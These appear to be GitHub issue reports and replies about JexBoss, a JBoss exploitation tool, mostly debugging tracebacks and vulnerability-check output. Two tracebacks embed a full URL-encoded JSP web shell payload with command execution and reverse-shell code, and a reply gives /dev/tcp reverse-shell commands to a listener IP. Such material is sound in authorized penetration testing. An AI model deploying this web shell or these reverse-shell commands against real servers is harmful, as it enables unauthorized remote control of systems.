I get a shell, but I get an error in executing any command.

Hello

I've received this error while exploiting the target ::

• Sending exploit code to http://x.x.x.x:80. Please wait...

Traceback (most recent call last):
File "jexboss.py", line 1155, in
main()
File "jexboss.py", line 932, in main
auto_exploit(url, vector)
File "jexboss.py", line 513, in auto_exploit
result = _exploits.exploit_jmx_console_file_repository(url)
File "/root/jexboss/_exploits.py", line 267, in exploit_jmx_console_file_repository
gl_http_pool.request('HEAD', url + payload, redirect=False, headers=headers)
File "/usr/lib/python2.7/dist-packages/urllib3/request.py", line 66, in request
**urlopen_kw)
File "/usr/lib/python2.7/dist-packages/urllib3/request.py", line 87, in request_encode_url
return self.urlopen(method, url, **extra_kw)
File "/usr/lib/python2.7/dist-packages/urllib3/poolmanager.py", line 244, in urlopen
response = conn.urlopen(method, u.request_uri, **kw)
File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 671, in urlopen
release_conn=release_conn, **response_kw)
File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 671, in urlopen
release_conn=release_conn, **response_kw)
File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 671, in urlopen
release_conn=release_conn, **response_kw)
File "/usr/lib/python2.7/dist-packages/urllib3/connectionpool.py", line 643, in urlopen
_stacktrace=sys.exc_info()[2])
File "/usr/lib/python2.7/dist-packages/urllib3/util/retry.py", line 363, in increment
raise MaxRetryError(_pool, url, error or ResponseError(cause))
urllib3.exceptions.MaxRetryError: HTTPConnectionPool(host='10.175.0.146', port=80): Max retries exceeded with url: /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=jexws4.war&argType=java.lang.String&arg1=jexws4&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3C%25%40%20%70%61%67%65%20%69%6D%70%6F%72%74%3D%22%6A%61%76%61%2E%6C%61%6E%67%2E%2A%2C%6A%61%76%61%2E%75%74%69%6C%2E%2A%2C%6A%61%76%61%2E%69%6F%2E%2A%2C%6A%61%76%61%2E%6E%65%74%2E%2A%22%20%70%61%67%65%45%6E%63%6F%64%69%6E%67%3D%22%55%54%46%2D%38%22%25%3E%20%3C%70%72%65%3E%20%3C%25%20%63%6C%61%73%73%20%72%76%20%65%78%74%65%6E%64%73%20%54%68%72%65%61%64%7B%49%6E%70%75%74%53%74%72%65%61%6D%20%69%73%3B%4F%75%74%70%75%74%53%74%72%65%61%6D%20%6F%73%3B%72%76%28%49%6E%70%75%74%53%74%72%65%61%6D%20%69%73%2C%4F%75%74%70%75%74%53%74%72%65%61%6D%20%6F%73%29%7B%74%68%69%73%2E%69%73%3D%69%73%3B%74%68%69%73%2E%6F%73%3D%6F%73%3B%7D%70%75%62%6C%69%63%20%76%6F%69%64%20%72%75%6E%28%29%7B%42%75%66%66%65%72%65%64%52%65%61%64%65%72%20%69%6E%3D%6E%75%6C%6C%3B%42%75%66%66%65%72%65%64%57%72%69%74%65%72%20%6F%75%74%3D%6E%75%6C%6C%3B%74%72%79%7B%69%6E%3D%6E%65%77%20%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%6E%65%77%20%49%6E%70%75%74%53%74%72%65%61%6D%52%65%61%64%65%72%28%74%68%69%73%2E%69%73%29%29%3B%6F%75%74%3D%6E%65%77%20%42%75%66%66%65%72%65%64%57%72%69%74%65%72%28%6E%65%77%20%4F%75%74%70%75%74%53%74%72%65%61%6D%57%72%69%74%65%72%28%74%68%69%73%2E%6F%73%29%29%3B%63%68%61%72%20%62%5B%5D%3D%6E%65%77%20%63%68%61%72%5B%38%31%39%32%5D%3B%69%6E%74%20%6C%3B%77%68%69%6C%65%28%28%6C%3D%69%6E%2E%72%65%61%64%28%62%2C%30%2C%62%2E%6C%65%6E%67%74%68%29%29%3E%30%29%7B%6F%75%74%2E%77%72%69%74%65%28%62%2C%30%2C%6C%29%3B%6F%75%74%2E%66%6C%75%73%68%28%29%3B%7D%7D%63%61%74%63%68%28%45%78%63%65%70%74%69%6F%6E%20%65%29%7B%7D%7D%7D%53%74%72%69%6E%67%20%73%68%3D%6E%75%6C%6C%3B%69%66%28%72%65%71%75%65%73%74%2E%67%65%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22%29%21%3D%6E%75%6C%6C%29%7B%73%68%3D%72%65%71%75%65%73%74%2E%67%65%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22%29%3B%7D%65%6C%73%65%20%69%66%28%72%65%71%75%65%73%74%2E%67%65%74%48%65%61%64%65%72%28%22%58%2D%4A%45%58%22%29%21%3D%20%6E%75%6C%6C%29%7B%73%68%3D%72%65%71%75%65%73%74%2E%67%65%74%48%65%61%64%65%72%28%22%58%2D%4A%45%58%22%29%3B%7D%69%66%28%73%68%20%21%3D%20%6E%75%6C%6C%29%7B%72%65%73%70%6F%6E%73%65%2E%73%65%74%43%6F%6E%74%65%6E%74%54%79%70%65%28%22%74%65%78%74%2F%68%74%6D%6C%22%29%3B%42%75%66%66%65%72%65%64%52%65%61%64%65%72%20%62%72%3D%6E%75%6C%6C%3B%53%74%72%69%6E%67%20%6C%68%63%3D%28%6E%65%77%20%44%61%74%65%28%29%2E%74%6F%53%74%72%69%6E%67%28%29%2E%73%70%6C%69%74%28%22%3A%22%29%5B%30%5D%2B%22%68%2E%6C%6F%67%22%29%2E%72%65%70%6C%61%63%65%41%6C%6C%28%22%20%22%2C%22%2D%22%29%3B%74%72%79%7B%69%66%28%72%65%71%75%65%73%74%2E%67%65%74%48%65%61%64%65%72%28%22%6E%6F%2D%63%68%65%63%6B%2D%75%70%64%61%74%65%73%22%29%3D%3D%6E%75%6C%6C%29%7B%48%74%74%70%55%52%4C%43%6F%6E%6E%65%63%74%69%6F%6E%20%63%3D%28%48%74%74%70%55%52%4C%43%6F%6E%6E%65%63%74%69%6F%6E%29%6E%65%77%20%55%52%4C%28%22%68%74%74%70%3A%2F%2F%77%65%62%73%68%65%6C%6C%2E%6A%65%78%62%6F%73%73%2E%6E%65%74%2F%6A%73%70%5F%76%65%72%73%69%6F%6E%2E%74%78%74%22%29%2E%6F%70%65%6E%43%6F%6E%6E%65%63%74%69%6F%6E%28%29%3B%63%2E%73%65%74%52%65%71%75%65%73%74%50%72%6F%70%65%72%74%79%28%22%55%73%65%72%2D%41%67%65%6E%74%22%2C%72%65%71%75%65%73%74%2E%67%65%74%48%65%61%64%65%72%28%22%48%6F%73%74%22%29%2B%22%3C%2D%22%2B%72%65%71%75%65%73%74%2E%67%65%74%52%65%6D%6F%74%65%41%64%64%72%28%29%29%3B%69%66%28%21%6E%65%77%20%46%69%6C%65%28%22%63%68%65%63%6B%5F%22%2B%6C%68%63%29%2E%65%78%69%73%74%73%28%29%29%7B%50%72%69%6E%74%57%72%69%74%65%72%20%77%3D%6E%65%77%20%50%72%69%6E%74%57%72%69%74%65%72%28%22%63%68%65%63%6B%5F%22%2B%6C%68%63%29%3B%77%2E%63%6C%6F%73%65%28%29%3B%62%72%3D%6E%65%77%20%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%6E%65%77%20%49%6E%70%75%74%53%74%72%65%61%6D%52%65%61%64%65%72%28%63%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%29%29%3B%53%74%72%69%6E%67%20%6C%76%3D%62%72%2E%72%65%61%64%4C%69%6E%65%28%29%2E%73%70%6C%69%74%28%22%20%22%29%5B%31%5D%3B%69%66%28%21%6C%76%2E%65%71%75%61%6C%73%28%22%34%22%29%29%7B%6F%75%74%2E%70%72%69%6E%74%28%22%4E%65%77%20%76%65%72%73%69%6F%6E%2E%20%50%6C%65%61%73%65%20%75%70%64%61%74%65%21%22%29%3B%7D%7D%65%6C%73%65%20%69%66%28%73%68%2E%69%6E%64%65%78%4F%66%28%22%69%64%22%29%21%3D%2D%31%7C%7C%73%68%2E%69%6E%64%65%78%4F%66%28%22%69%70%63%6F%6E%66%69%67%22%29%21%3D%2D%31%29%7B%63%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%3B%7D%7D%7D%63%61%74%63%68%28%45%78%63%65%70%74%69%6F%6E%20%65%29%7B%6F%75%74%2E%70%72%69%6E%74%6C%6E%28%22%46%61%69%6C%65%64%20%74%6F%20%63%68%65%63%6B%20%66%6F%72%20%75%70%64%61%74%65%73%22%29%3B%7D%74%72%79%7B%50%72%6F%63%65%73%73%20%70%3B%62%6F%6F%6C%65%61%6E%20%6E%69%78%3D%74%72%75%65%3B%69%66%28%21%53%79%73%74%65%6D%2E%67%65%74%50%72%6F%70%65%72%74%79%28%22%66%69%6C%65%2E%73%65%70%61%72%61%74%6F%72%22%29%2E%65%71%75%61%6C%73%28%22%2F%22%29%29%7B%6E%69%78%3D%66%61%6C%73%65%3B%7D%69%66%28%73%68%2E%69%6E%64%65%78%4F%66%28%22%6A%65%78%72%65%6D%6F%74%65%3D%22%29%21%3D%2D%31%29%7B%53%6F%63%6B%65%74%20%73%63%3D%6E%65%77%20%53%6F%63%6B%65%74%28%73%68%2E%73%70%6C%69%74%28%22%3D%22%29%5B%31%5D%2E%73%70%6C%69%74%28%22%3A%22%29%5B%30%5D%2C%49%6E%74%65%67%65%72%2E%70%61%72%73%65%49%6E%74%28%73%68%2E%73%70%6C%69%74%28%22%3A%22%29%5B%31%5D%29%29%3B%69%66%28%6E%69%78%29%7B%73%68%3D%22%2F%62%69%6E%2F%62%61%73%68%22%3B%7D%65%6C%73%65%7B%73%68%3D%22%63%6D%64%2E%65%78%65%22%3B%7D%70%3D%52%75%6E%74%69%6D%65%2E%67%65%74%52%75%6E%74%69%6D%65%28%29%2E%65%78%65%63%28%73%68%29%3B%28%6E%65%77%20%72%76%28%70%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%2C%73%63%2E%67%65%74%4F%75%74%70%75%74%53%74%72%65%61%6D%28%29%29%29%2E%73%74%61%72%74%28%29%3B%28%6E%65%77%20%72%76%28%73%63%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%2C%70%2E%67%65%74%4F%75%74%70%75%74%53%74%72%65%61%6D%28%29%29%29%2E%73%74%61%72%74%28%29%3B%7D%65%6C%73%65%7B%69%66%28%6E%69%78%29%7B%70%3D%52%75%6E%74%69%6D%65%2E%67%65%74%52%75%6E%74%69%6D%65%28%29%2E%65%78%65%63%28%6E%65%77%20%53%74%72%69%6E%67%5B%5D%7B%22%2F%62%69%6E%2F%62%61%73%68%22%2C%22%2D%63%22%2C%73%68%7D%29%3B%7D%65%6C%73%65%7B%70%3D%52%75%6E%74%69%6D%65%2E%67%65%74%52%75%6E%74%69%6D%65%28%29%2E%65%78%65%63%28%22%63%6D%64%2E%65%78%65%20%2F%43%20%22%2B%73%68%29%3B%7D%62%72%3D%6E%65%77%20%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%6E%65%77%20%49%6E%70%75%74%53%74%72%65%61%6D%52%65%61%64%65%72%28%70%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%29%29%3B%53%74%72%69%6E%67%20%64%3D%62%72%2E%72%65%61%64%4C%69%6E%65%28%29%3B%77%68%69%6C%65%28%64%20%21%3D%20%6E%75%6C%6C%29%7B%6F%75%74%2E%70%72%69%6E%74%6C%6E%28%64%29%3B%64%3D%62%72%2E%72%65%61%64%4C%69%6E%65%28%29%3B%7D%7D%7D%63%61%74%63%68%28%45%78%63%65%70%74%69%6F%6E%20%65%29%7B%6F%75%74%2E%70%72%69%6E%74%6C%6E%28%22%55%6E%6B%6E%6F%77%6E%20%63%6F%6D%6D%61%6E%64%22%29%3B%7D%7D%25%3E&argType=boolean&arg4=True (Caused by ProtocolError('Connection aborted.', BadStatusLine("''",)))

I often get that kind of result when the code is deployed :

Example:
Shell>jexremote=192.168.0.10:4444

Or use other techniques of your choice, like:
Shell>/bin/bash -i > /dev/tcp/192.168.0.10/4444 0>&1 2>&1

And so on... =]

-----------------------------------------

Thanks.

Fresh install without any error on Git Bash for Windows is not working.

$ python jexboss.py -h
Traceback (most recent call last):
File "jexboss.py", line 49, in
from _exploits import *
File "E:\jexboss_exploits.py", line 21, in
from jexboss import *
File "E:\jexboss\jexboss.py", line 64, in
traceback.print_exc(file=debug_file)
NameError: name 'debug_file' is not defined

• Checking for updates in: http://joaomatosf.com/rnp/releases.txt **

• Error: could not check for updates ...

** Checking Host: http://google.com **

[*] Checking JMX Tomcat:

• An error occurred while connecting to the host http://google.com (invalid literal for int() with base 10: '//google.com')

Hello,
Suggestions? I saw the other list index out of range issue. Figured this is probably the same. Is code actually being uploaded? But not able to connect back to the reverse shell?

I'm running this externally and internally.

@Version: 1.0.11

• Checking for updates in: http://joaomatosf.com/rnp/releases.txt **
  ** Checking Host: xxx.xxx.xxx.xxx:xxxxx **
• Checking admin-console: [ EXPOSED ]
• Checking web-console: [ VULNERABLE ]
• Checking jmx-console: [ VULNERABLE ]
• Checking JMXInvokerServlet: [ VULNERABLE ]
• Do you want to try to run an automated exploitation via "jmx-console" ?
  This operation will provide a simple command shell to execute commands on the server..
  Continue only if you have permission!
  yes/NO ? yes
• Sending exploit code to xxx.xxx.xxx.xxx:xxxxx Please wait...
• Successfully deployed code! Starting command shell. Please wait...
• • - - - - - - - - - - - - - - - - - - - LOL - - - - - - - - - - - - - - - - - - - - *
• xxx.xxx.xxx.xxx:xxxxx:

Traceback (most recent call last):
File "./jexboss.py", line 532, in
main()
File "./jexboss.py", line 381, in main
auto_exploit(url, i)
File "./jexboss.py", line 230, in auto_exploit
shell_http(url, exploit_type)
File "./jexboss.py", line 271, in shell_http
resp += " " + str(r.data).split(">")[1]
IndexError: list index out of range

Hi, joaomatosf,
When I use your tools to exploit, I find many false alarm.
I was been told there ware all VULNERABLE, then I tried to run an automated exploitation to execute a command,but only got an error "*Error contacting the command shell. Try again later..."
Then I tried to access the url like http://xxxx.com/jmx-console/, the response status is 200 and the body is:

<!--link rel="stylesheet" href="/layout/default.css" type="text/css"-->
<html>
    <head>
        <script type="text/javascript">
window.location.href='http://xxxxxx.com/404.jsp';
</script>
    </head>
    <body>
</body>
</html>

I read the codes and suspect the logic of check_vul method in jexboss.py isn't rigorous. In the check_vul, HEAD method is used to get the response and judge whether been VULNERABLE only depend on the response's status.If status is 200 or 500, there are VULNERABLE. But, my response's status is 200 and the response's body is a 404 page.So I think it's better to check the body's content to avoid the false alarm.
Thank you!

Hi,

When executed the following command to run jexboss.

python jexboss.py -host http://localhost:8080

I am getting the following result

 * Checking for updates in: http://joaomatosf.com/rnp/releases.txt **


 ** Checking Host: http://localhost:8080 **

 [*] Checking admin-console:                  [ OK ]
 [*] Checking Struts2:                      
 * An error occurred while connecting to the host http://localhost:8080 (HTTPConnectionPool(host='localhost', port=8080): Max retries exceeded with url: / (Caused by ReadTimeoutError("HTTPConnectionPool(host='localhost', port=8080): Read timed out. (read timeout=6.0)",)))

 [*] Checking Servlet Deserialization:        [ OK ]
 [*] Checking Application Deserialization:    [ OK ]
 [*] Checking Jenkins:                        [ OK ]
 [*] Checking web-console:                    [ OK ]
 [*] Checking jmx-console:                    [ OK ]
 [*] Checking JMXInvokerServlet:              [ OK ]


 * Results: 
   The server is not vulnerable to bugs tested ... :D

 * Info: review, suggestions, updates, etc: 
   https://github.com/joaomatosf/jexboss

 * DONATE: Please consider making a donation to help improve this tool,
 * Bitcoin Address:  14x4niEpfp7CegBYr3tTzTn4h6DAnDCD9C 

Can anyone help me with this? The connection between my workstation and the remote server (for which I have masked the IP with 'localhost' here) is completely fine. I have all services's access to this server.

hello
thx for this good job

please if we have a windows server
how to interact with a metasploit windows listner.
i want the équivalent command to this one :
/bin/bash -i > /dev/tcp/attacker_IP/4444 0>&1 2>&1
thx

• An error occurred while connecting to the host https://172.xx.xx.xx:7443/ (HTTPSConnectionPool(host='172.xx.xx.xx', port=7443): Max retries exceeded with url: //invoker/JMXInvokerServlet (Caused by SSLError(SSLError(1, u'[SSL: DH_KEY_TOO_SMALL] dh key too small (_ssl.c:661)'),)))

How to solve this problem anyone?

Hello,

I have a problem, failed script.

• Checking Host: http://x.x.x.x:9443/ **
  • Checking web-console: [ VULNERABLE ]
  • Checking jmx-console: [ VULNERABLE ]
  • Checking JMXInvokerServlet: [ VULNERABLE ]
  • Do you want to try to run an automated exploitation via "jmx-console" ?
    This operation will provide a simple command shell to execute commands on the server..
    Continue only if you have permission!
    yes/NO ? yes
  • Sending exploit code to http://x.x.x.x:9443/. Wait...
  • Successfully deployed code! Starting command shell, wait...
  • • - - - - - - - - - - - - - - - - - - - LOL - - - - - - - - - - - - - - - - - - - - *
  • http://x.x.x.x:9443/:

Traceback (most recent call last):
File "jexboss.py", line 415, in
autoExploit(url, i)
File "jexboss.py", line 105, in autoExploit
shell_http(url, type)
File "jexboss.py", line 133, in shell_http
resp += " " + r.data.split(">")[1]
IndexError: list index out of range

Hey great tool! It doesn't seem to work over HTTPS when using port 8443? My guest portal I want to test against is hardset to TCP port 8443 but I get the error below;

** Checking Host: https://10.5.123.4:8443/portal/SelfRegistration.action?from=LOGIN **

[*] Checking Struts2:

• An error occurred while connecting to the host https://10.5.123.4:8443/portal/SelfRegistration.action?from=LOGIN

I noticed that the variable was declared as "auto-exploit", but was referenced as "auto_exploit" in the rest of the code (dash vs. underscore). This may be causing issues with the intended function of auto-exploit feature:

Line 505: parser.add_argument("--auto-exploit", "-A",....

Line 228: if not gl_args.auto_exploit:

Hi joaomatosf,

Traceback (most recent call last):
File "jexboss.py", line 660, in
main()
File "jexboss.py", line 542, in main
result_exploit = auto_exploit(url, key)
File "jexboss.py", line 313, in auto_exploit
result = _exploits.exploit_admin_console(url, gl_args.jboss_login)
File "C:\Python2713\jexboss-master_exploits.py", line 466, in exploit_admin_c
onsole
payload = "login_form=login_form&login_form%3Aname="+username+"&login_form%3
Apassword="+password+"&login_form%3Asubmit=Login&javax.faces.ViewState="+url_enc
ode(state)
File "C:\Python2713\jexboss-master_exploits.py", line 442, in url_encode
return urllib.quote_plus(text)
File "C:\Python2713\lib\urllib.py", line 1303, in quote_plus
if ' ' in s:
TypeError: argument of type 'NoneType' is not iterable

Is anyone having the same error messages as follow?

/usr/local/lib/python2.7/dist-packages/requests/packages/urllib3/connectionpool.py:843: InsecureRequestWarning: Unverified HTTPS request is being made. Adding certificate verification is strongly advised. See: https://urllib3.readthedocs.io/en/latest/advanced-usage.html#ssl-warnings
  InsecureRequestWarning)

Based on the recommended URL, I added the disable warning message (not recommended of course) but am still seeing a horde of the warning messages. Any idea?

import urllib3
urllib3.disable_warnings()

When running on the default Kali 2016 install (or Ubuntu derivatives, etc.) The following error message is seen:

Traceback (most recent call last):
  File "jexboss.py", line 23, in <module>
    from idlelib.ColorDelegator import prog
ImportError: No module named idlelib.ColorDelegator

This is a dependency issue (https://pypi.python.org/pypi/cricket/0.2.3). Kali and Ubuntu’s packaging of Python omits the idlelib library from it’s base package.

Users can install idlelib by running:

$ sudo apt-get install idle-python2.7

http://webshell.jexboss.net/

Hi, on:

Python 2.7.12 (default, Nov  7 2016, 11:55:55) 
[GCC 6.2.1 20160830] on linux2

after:

/opt/jexboss:
> sudo pip install -r requires.txt 
Requirement already satisfied: urllib3>=1.8 in /usr/lib/python2.7/site-packages (from -r requires.txt (line 1))
Requirement already satisfied: ipaddress in /usr/lib/python2.7/site-packages (from -r requires.txt (line 2))

i've got problem with exploit:

** Checking Host: http://10.0.0.2:8081 **

 * Checking admin-console: 	 [ OK ]
 * Checking web-console: 	 [ VULNERABLE ]
 * Checking jmx-console: 	 [ VULNERABLE ]
 * Checking JMXInvokerServlet: 	 [ VULNERABLE ]

 * Do you want to try to run an automated exploitation via "jmx-console" ?
   This operation will provide a simple command shell to execute commands on the server..
   Continue only if you have permission!
   yes/NO? yes

 * Sending exploit code to http://10.0.0.2:8081. Please wait...

Traceback (most recent call last):
  File "./jexboss.py", line 681, in <module>
    main()
  File "./jexboss.py", line 520, in main
    auto_exploit(url, i)
  File "./jexboss.py", line 303, in auto_exploit
    result = _exploits.exploit_jmx_console_file_repository(url)
  File "/opt/jexboss/_exploits.py", line 176, in exploit_jmx_console_file_repository
    gl_http_pool.request('HEAD', url + payload, redirect=False, headers=headers)
  File "/usr/lib/python2.7/site-packages/urllib3/request.py", line 66, in request
    **urlopen_kw)
  File "/usr/lib/python2.7/site-packages/urllib3/request.py", line 87, in request_encode_url
    return self.urlopen(method, url, **extra_kw)
  File "/usr/lib/python2.7/site-packages/urllib3/poolmanager.py", line 244, in urlopen
    response = conn.urlopen(method, u.request_uri, **kw)
  File "/usr/lib/python2.7/site-packages/urllib3/connectionpool.py", line 671, in urlopen
    release_conn=release_conn, **response_kw)
  File "/usr/lib/python2.7/site-packages/urllib3/connectionpool.py", line 671, in urlopen
    release_conn=release_conn, **response_kw)
  File "/usr/lib/python2.7/site-packages/urllib3/connectionpool.py", line 671, in urlopen
    release_conn=release_conn, **response_kw)
  File "/usr/lib/python2.7/site-packages/urllib3/connectionpool.py", line 643, in urlopen
    _stacktrace=sys.exc_info()[2])
  File "/usr/lib/python2.7/site-packages/urllib3/util/retry.py", line 363, in increment
    raise MaxRetryError(_pool, url, error or ResponseError(cause))
urllib3.exceptions.MaxRetryError: HTTPConnectionPool(host='10.0.0.2', port=8081): Max retries exceeded with url: /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=jexws4.war&argType=java.lang.String&arg1=jexws4&argType=java.lang.String&arg2=.jsp&argType=java.lang.String&arg3=%3C%25%40%20%70%61%67%65%20%69%6D%70%6F%72%74%3D%22%6A%61%76%61%2E%6C%61%6E%67%2E%2A%2C%6A%61%76%61%2E%75%74%69%6C%2E%2A%2C%6A%61%76%61%2E%69%6F%2E%2A%2C%6A%61%76%61%2E%6E%65%74%2E%2A%22%20%70%61%67%65%45%6E%63%6F%64%69%6E%67%3D%22%55%54%46%2D%38%22%25%3E%20%3C%70%72%65%3E%20%3C%25%20%63%6C%61%73%73%20%72%76%20%65%78%74%65%6E%64%73%20%54%68%72%65%61%64%7B%49%6E%70%75%74%53%74%72%65%61%6D%20%69%73%3B%4F%75%74%70%75%74%53%74%72%65%61%6D%20%6F%73%3B%72%76%28%49%6E%70%75%74%53%74%72%65%61%6D%20%69%73%2C%4F%75%74%70%75%74%53%74%72%65%61%6D%20%6F%73%29%7B%74%68%69%73%2E%69%73%3D%69%73%3B%74%68%69%73%2E%6F%73%3D%6F%73%3B%7D%70%75%62%6C%69%63%20%76%6F%69%64%20%72%75%6E%28%29%7B%42%75%66%66%65%72%65%64%52%65%61%64%65%72%20%69%6E%3D%6E%75%6C%6C%3B%42%75%66%66%65%72%65%64%57%72%69%74%65%72%20%6F%75%74%3D%6E%75%6C%6C%3B%74%72%79%7B%69%6E%3D%6E%65%77%20%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%6E%65%77%20%49%6E%70%75%74%53%74%72%65%61%6D%52%65%61%64%65%72%28%74%68%69%73%2E%69%73%29%29%3B%6F%75%74%3D%6E%65%77%20%42%75%66%66%65%72%65%64%57%72%69%74%65%72%28%6E%65%77%20%4F%75%74%70%75%74%53%74%72%65%61%6D%57%72%69%74%65%72%28%74%68%69%73%2E%6F%73%29%29%3B%63%68%61%72%20%62%5B%5D%3D%6E%65%77%20%63%68%61%72%5B%38%31%39%32%5D%3B%69%6E%74%20%6C%3B%77%68%69%6C%65%28%28%6C%3D%69%6E%2E%72%65%61%64%28%62%2C%30%2C%62%2E%6C%65%6E%67%74%68%29%29%3E%30%29%7B%6F%75%74%2E%77%72%69%74%65%28%62%2C%30%2C%6C%29%3B%6F%75%74%2E%66%6C%75%73%68%28%29%3B%7D%7D%63%61%74%63%68%28%45%78%63%65%70%74%69%6F%6E%20%65%29%7B%7D%7D%7D%53%74%72%69%6E%67%20%73%68%3D%6E%75%6C%6C%3B%69%66%28%72%65%71%75%65%73%74%2E%67%65%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22%29%21%3D%6E%75%6C%6C%29%7B%73%68%3D%72%65%71%75%65%73%74%2E%67%65%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22%29%3B%7D%65%6C%73%65%20%69%66%28%72%65%71%75%65%73%74%2E%67%65%74%48%65%61%64%65%72%28%22%58%2D%4A%45%58%22%29%21%3D%20%6E%75%6C%6C%29%7B%73%68%3D%72%65%71%75%65%73%74%2E%67%65%74%48%65%61%64%65%72%28%22%58%2D%4A%45%58%22%29%3B%7D%69%66%28%73%68%20%21%3D%20%6E%75%6C%6C%29%7B%72%65%73%70%6F%6E%73%65%2E%73%65%74%43%6F%6E%74%65%6E%74%54%79%70%65%28%22%74%65%78%74%2F%68%74%6D%6C%22%29%3B%42%75%66%66%65%72%65%64%52%65%61%64%65%72%20%62%72%3D%6E%75%6C%6C%3B%53%74%72%69%6E%67%20%6C%68%63%3D%28%6E%65%77%20%44%61%74%65%28%29%2E%74%6F%53%74%72%69%6E%67%28%29%2E%73%70%6C%69%74%28%22%3A%22%29%5B%30%5D%2B%22%68%2E%6C%6F%67%22%29%2E%72%65%70%6C%61%63%65%41%6C%6C%28%22%20%22%2C%22%2D%22%29%3B%74%72%79%7B%69%66%28%72%65%71%75%65%73%74%2E%67%65%74%48%65%61%64%65%72%28%22%6E%6F%2D%63%68%65%63%6B%2D%75%70%64%61%74%65%73%22%29%3D%3D%6E%75%6C%6C%29%7B%48%74%74%70%55%52%4C%43%6F%6E%6E%65%63%74%69%6F%6E%20%63%3D%28%48%74%74%70%55%52%4C%43%6F%6E%6E%65%63%74%69%6F%6E%29%6E%65%77%20%55%52%4C%28%22%68%74%74%70%3A%2F%2F%77%65%62%73%68%65%6C%6C%2E%6A%65%78%62%6F%73%73%2E%6E%65%74%2F%6A%73%70%5F%76%65%72%73%69%6F%6E%2E%74%78%74%22%29%2E%6F%70%65%6E%43%6F%6E%6E%65%63%74%69%6F%6E%28%29%3B%63%2E%73%65%74%52%65%71%75%65%73%74%50%72%6F%70%65%72%74%79%28%22%55%73%65%72%2D%41%67%65%6E%74%22%2C%72%65%71%75%65%73%74%2E%67%65%74%48%65%61%64%65%72%28%22%48%6F%73%74%22%29%2B%22%3C%2D%22%2B%72%65%71%75%65%73%74%2E%67%65%74%52%65%6D%6F%74%65%41%64%64%72%28%29%29%3B%69%66%28%21%6E%65%77%20%46%69%6C%65%28%22%63%68%65%63%6B%5F%22%2B%6C%68%63%29%2E%65%78%69%73%74%73%28%29%29%7B%50%72%69%6E%74%57%72%69%74%65%72%20%77%3D%6E%65%77%20%50%72%69%6E%74%57%72%69%74%65%72%28%22%63%68%65%63%6B%5F%22%2B%6C%68%63%29%3B%77%2E%63%6C%6F%73%65%28%29%3B%62%72%3D%6E%65%77%20%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%6E%65%77%20%49%6E%70%75%74%53%74%72%65%61%6D%52%65%61%64%65%72%28%63%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%29%29%3B%53%74%72%69%6E%67%20%6C%76%3D%62%72%2E%72%65%61%64%4C%69%6E%65%28%29%2E%73%70%6C%69%74%28%22%20%22%29%5B%31%5D%3B%69%66%28%21%6C%76%2E%65%71%75%61%6C%73%28%22%34%22%29%29%7B%6F%75%74%2E%70%72%69%6E%74%28%22%4E%65%77%20%76%65%72%73%69%6F%6E%2E%20%50%6C%65%61%73%65%20%75%70%64%61%74%65%21%22%29%3B%7D%7D%65%6C%73%65%20%69%66%28%73%68%2E%69%6E%64%65%78%4F%66%28%22%69%64%22%29%21%3D%2D%31%7C%7C%73%68%2E%69%6E%64%65%78%4F%66%28%22%69%70%63%6F%6E%66%69%67%22%29%21%3D%2D%31%29%7B%63%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%3B%7D%7D%7D%63%61%74%63%68%28%45%78%63%65%70%74%69%6F%6E%20%65%29%7B%6F%75%74%2E%70%72%69%6E%74%6C%6E%28%22%46%61%69%6C%65%64%20%74%6F%20%63%68%65%63%6B%20%66%6F%72%20%75%70%64%61%74%65%73%22%29%3B%7D%74%72%79%7B%50%72%6F%63%65%73%73%20%70%3B%62%6F%6F%6C%65%61%6E%20%6E%69%78%3D%74%72%75%65%3B%69%66%28%21%53%79%73%74%65%6D%2E%67%65%74%50%72%6F%70%65%72%74%79%28%22%66%69%6C%65%2E%73%65%70%61%72%61%74%6F%72%22%29%2E%65%71%75%61%6C%73%28%22%2F%22%29%29%7B%6E%69%78%3D%66%61%6C%73%65%3B%7D%69%66%28%73%68%2E%69%6E%64%65%78%4F%66%28%22%6A%65%78%72%65%6D%6F%74%65%3D%22%29%21%3D%2D%31%29%7B%53%6F%63%6B%65%74%20%73%63%3D%6E%65%77%20%53%6F%63%6B%65%74%28%73%68%2E%73%70%6C%69%74%28%22%3D%22%29%5B%31%5D%2E%73%70%6C%69%74%28%22%3A%22%29%5B%30%5D%2C%49%6E%74%65%67%65%72%2E%70%61%72%73%65%49%6E%74%28%73%68%2E%73%70%6C%69%74%28%22%3A%22%29%5B%31%5D%29%29%3B%69%66%28%6E%69%78%29%7B%73%68%3D%22%2F%62%69%6E%2F%62%61%73%68%22%3B%7D%65%6C%73%65%7B%73%68%3D%22%63%6D%64%2E%65%78%65%22%3B%7D%70%3D%52%75%6E%74%69%6D%65%2E%67%65%74%52%75%6E%74%69%6D%65%28%29%2E%65%78%65%63%28%73%68%29%3B%28%6E%65%77%20%72%76%28%70%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29%2C%73%63%2E%67%65%74%4F%75%74%70%75%74%53%74%72%65%61%6D%28%29%29%29%2E%73%74%61%72%74%28%29%3B%28%6E%65%77%20%72%76%2